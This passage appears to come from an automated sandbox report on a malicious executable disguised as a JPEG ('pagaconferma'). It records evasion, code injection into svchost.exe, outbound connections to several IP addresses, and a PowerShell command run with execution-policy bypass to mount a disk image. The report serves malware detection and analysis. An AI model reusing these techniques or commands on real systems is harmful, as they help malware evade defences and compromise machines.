        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeAPI/Special instruction interceptor: Address: 43EB45C
        Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5170000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5700000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 7700000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599656Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599547Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599437Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599328Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599219Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599094Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598985Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598860Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598735Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598610Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598485Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9887Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 9961Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep count: 9887 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8512Thread sleep count: 9961 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -599875s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -599766s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -599656s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -599547s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -599437s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -599328s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -599219s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -599094s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -598985s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -598860s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -598735s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -598610s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508Thread sleep time: -598485s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599656Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599547Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599437Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599328Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599219Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599094Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598985Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598860Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598735Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598610Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598485Jump to behavior
        Source: svchost.exe, 00000008.00000002.33968540313.0000000003254000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 158.101.44.242 80Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.67.152 443Jump to behavior
        Maps a DLL or memory area into another process
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
        Writes to foreign memory regions
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F56008Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)Jump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "D:\9236-pagaconferma-jpg.exe" Jump to behavior
        Source: 9236-pagaconferma-jpg.exe, 00000007.00000002.31559101907.0000000000482000.00000002.00000001.01000000.00000003.sdmp, 9236-pagaconferma-jpg.exe, 00000007.00000000.31539891841.0000000000482000.00000002.00000001.01000000.00000003.sdmp, g1TLK7mbZD.img, 9236-pagaconferma-jpg.exe.2.drBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
